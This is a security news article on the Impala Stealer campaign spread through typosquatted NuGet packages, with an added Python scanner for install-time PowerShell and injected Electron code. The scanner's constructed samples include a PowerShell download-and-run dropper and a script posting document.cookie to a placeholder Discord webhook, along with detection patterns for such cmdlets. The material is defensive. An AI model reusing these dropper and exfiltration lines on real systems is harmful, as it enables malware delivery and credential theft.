Cybersecurity researchers have uncovered the inner workings of a cryptocurrency-stealing malware distributed through 13 malicious NuGet packages. The supply chain attack targeted .NET developers with a typosquatting campaign: packages impersonating legitimate ones executed PowerShell code that fetched a second-stage binary from a hard-coded server.
The two-stage attack deployed a persistent .NET backdoor called Impala Stealer, built to gain unauthorized access to victims' cryptocurrency accounts. JFrog, which reported the campaign last month, noted that the malware relied on an unusual obfuscation method, .NET AOT compilation. Because the output is native code without the IL and metadata that standard .NET decompilers work from, this makes the binary stealthier and harder to reverse engineer than conventional obfuscators do.
.NET AOT compilation is an optimization that compiles an application to native code ahead of time; native AOT applications start faster, use less memory and run without the .NET runtime installed. The second-stage payload includes an auto-update feature that fetches newer versions of the executable from a remote server. It persists by injecting JavaScript code into the Discord or Microsoft Visual Studio Code apps (both Electron-based), and that injected code then launches the cryptocurrency stealer binary.
The stealer then looks for the Exodus Wallet desktop application and injects JavaScript into several of its HTML files to collect sensitive data and send it to a hard-coded Discord webhook. The JavaScript snippet, which was hosted on an online paste site, has since been taken down, but it is believed to have harvested user credentials and other valuable information.
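As an added illustration of the two artefacts the campaign relies on (this is example code written for this page, not code from the article, from JFrog or from the malware), the following Python scanner checks the two places a defender would look first: the PowerShell install script inside a .nupkg (NuGet runs a package's tools/init.ps1 when the package is installed from Visual Studio, a NuGet behaviour the article does not spell out), and the HTML/JS resources of an Electron app such as Discord, VS Code or Exodus, for a hard-coded Discord webhook or a script tag that loads code from a remote origin. The sample package, its install script, the TEST-NET download address and the webhook URL are all constructed here and are not the campaign's real indicators; in practice the Electron files would be read from disk or from an extracted app.asar.

```python
import io
import re
import zipfile

# NuGet executes a package's tools/init.ps1 when the package is installed from
# Visual Studio (NuGet behaviour; the article does not name the file).
PS_SUSPICIOUS = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b|DownloadFile|"
    r"DownloadString|Start-Process|-EncodedCommand",
    re.IGNORECASE,
)
# Discord webhook URLs have a fixed shape: /api/webhooks/<numeric id>/<token>.
DISCORD_WEBHOOK = re.compile(
    r"https?://(?:[\w.-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+",
    re.IGNORECASE,
)
# A <script> pulling its body from a remote origin inside a packaged Electron
# app is a strong signal that the app's files were tampered with.
REMOTE_SCRIPT = re.compile(r"<script[^>]*\bsrc=[\"']https?://", re.IGNORECASE)


def scan_nupkg(data: bytes) -> list[str]:
    """Return findings for install-time PowerShell inside a .nupkg (a zip file)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            lower = name.lower()
            if not (lower.startswith("tools/") and lower.endswith(".ps1")):
                continue
            text = pkg.read(name).decode("utf-8", errors="replace")
            hits = sorted({m.group(0) for m in PS_SUSPICIOUS.finditer(text)}, key=str.lower)
            if hits:
                findings.append(f"{name}: install-time PowerShell uses {', '.join(hits)}")
    return findings


def scan_electron_resources(files: dict[str, str]) -> list[str]:
    """Return findings for injected code in an Electron app's HTML/JS files.

    `files` maps a path (relative to the app's resources directory) to its text.
    """
    findings = []
    for path, text in files.items():
        if not path.lower().endswith((".html", ".js")):
            continue
        for m in DISCORD_WEBHOOK.finditer(text):
            findings.append(f"{path}: hard-coded Discord webhook {m.group(0)}")
        if REMOTE_SCRIPT.search(text):
            findings.append(f"{path}: <script> loading code from a remote origin")
    return findings


# --- constructed samples (not the campaign's real artefacts) ---------------

SAMPLE_INIT_PS1 = r"""
# Constructed dropper: fetch a second-stage binary from a hard-coded server.
$u = 'https://203.0.113.10/update.bin'   # TEST-NET address, placeholder only
$p = Join-Path $env:TEMP 'update.exe'
Invoke-WebRequest -Uri $u -OutFile $p
Start-Process -FilePath $p
"""

SAMPLE_NUSPEC = """<?xml version="1.0"?>
<package><metadata><id>Example.Typosquat</id><version>1.0.0</version>
<authors>constructed</authors><description>constructed sample</description>
</metadata></package>"""


def build_sample_nupkg() -> bytes:
    """Build an in-memory .nupkg laid out like a package carrying an install script."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("Example.Typosquat.nuspec", SAMPLE_NUSPEC)
        pkg.writestr("lib/netstandard2.0/Example.Typosquat.dll", b"MZ")  # stand-in
        pkg.writestr("tools/init.ps1", SAMPLE_INIT_PS1)
    return buf.getvalue()


SAMPLE_ELECTRON_FILES = {
    # untouched page: only a local script
    "app/index.html": '<html><head><script src="./renderer.js"></script></head></html>',
    # tampered page: exfiltrates to a webhook (constructed URL, not a real one)
    "app/wallet.html": (
        '<html><body><script>fetch("https://discord.com/api/webhooks/'
        '000000000000000000/EXAMPLE-TOKEN", {method: "POST", body: document.cookie});'
        "</script></body></html>"
    ),
}

if __name__ == "__main__":
    for finding in scan_nupkg(build_sample_nupkg()) + scan_electron_resources(SAMPLE_ELECTRON_FILES):
        print(finding)
```

The PowerShell check is deliberately a coarse cmdlet list: an install script that downloads and runs anything deserves a human look regardless of what it fetches, so false positives are cheap here. The webhook pattern is the cheaper of the two Electron checks and the harder one for an attacker to avoid, since the exfiltration endpoint has to be reachable from the injected code somewhere.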
Shachar Menashe, senior director at JFrog Security Research, explained that the attackers used typosquatting to deploy a custom malicious payload targeting the Exodus crypto wallet, leaking the victims' credentials to cryptocurrency exchanges via code injection. Menashe emphasized that no open-source software repository is entirely trustworthy and that developers should apply safety measures throughout the software development lifecycle to secure the software supply chain.
The findings follow the discovery by security firm Phylum of a malicious npm package named mathjs-min. Uploaded to the registry on March 26, 2023, it contained a credential stealer that targeted Discord passwords from the official app and from web browsers such as Google Chrome, Brave and Opera. The package is a modified copy of the popular JavaScript math library mathjs, injected with malicious code and published to npm as if it were a minified build of the genuine library.